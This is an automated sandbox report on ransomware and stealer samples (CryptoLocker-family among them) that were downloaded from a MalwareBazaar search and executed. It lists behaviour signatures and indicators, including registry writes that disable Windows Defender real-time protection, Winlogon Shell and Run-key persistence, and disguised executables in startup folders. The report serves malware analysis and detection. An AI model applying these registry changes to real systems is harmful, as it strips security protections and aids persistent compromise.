Malware Analysis Report

2025-05-05 21:43

Sample ID 250419-zvxnravvgs
Target https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
Tags
cryptolocker credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The submitted URL https://bazaar.abuse.ch/browse.php?search=tag%3Alocker was found to be: Known bad. The detonation browsed the MalwareBazaar search page for tag:locker; the activity below comes from the samples downloaded and executed from it during the run.

Malicious Activity Summary

cryptolocker credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan

UAC bypass

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender DisableAntiSpyware settings

CryptoLocker

Modifies WinLogon for persistence

Cryptolocker family

Deletes shadow copies

Disables RegEdit via registry modification

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Boot or Logon Autostart Execution: Active Setup

Credentials from Password Stores: Windows Credential Manager

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Drops desktop.ini file(s)

Adds Run key to start application

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Drops autorun.inf file

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Event Triggered Execution: Netsh Helper DLL

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates system info in registry

Uses Volume Shadow Copy service COM API

Runs net.exe

Scheduled Task/Job: Scheduled Task

Checks processor information in registry

System policy modification

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Opens file in notepad (likely ransom note)

Kills process with taskkill

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Uses Volume Shadow Copy WMI provider

Modifies Internet Explorer settings

Gathers network information

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-04-19 21:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-19 21:02

Reported

2025-04-19 21:18

Platform

win10ltsc2021-20250314-en

Max time kernel

934s

Max time network

936s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bazaar.abuse.ch/browse.php?search=tag%3Alocker

Signatures

CryptoLocker

ransomware cryptolocker

Cryptolocker family

cryptolocker

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Windows\SysWOW64\reg.exe N/A
Note: the signature matched on the write to EnableLUA, but the value written is 1, which is the default and keeps UAC enabled (0 would disable it). Treat this row as reg.exe touching the UAC policy, not as a confirmed bypass.

Deletes shadow copies

ransomware defense_evasion impact execution

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Note: explorer.exe is the process that evaluates Active Setup at user logon and records each processed component under the per-user Installed Components key, so these creations are the mechanism running rather than the payload itself. A malicious component would be registered with a StubPath under HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID}; this section of the report does not show which entry, if any, triggered these writes.

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\SysWOW64\reg.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmp2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\winlogon.exe C:\Windows\system32\taskmgr.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe N/A
N/A N/A C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe N/A
N/A N/A C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe N/A
N/A N/A C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe N/A
N/A N/A C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
N/A N/A C:\ProgramData\winlogon.exe N/A
N/A N/A C:\Windows\winlogon.exe N/A
N/A N/A C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
N/A N/A C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
N/A N/A C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp1.jpg N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\tmp2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tsuchigumo.bat = "C:\\Windows\\system32\\Tsuchigumo.bat" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileRescue = "C:\\ZeroLocker\\ZeroRescue.exe" C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
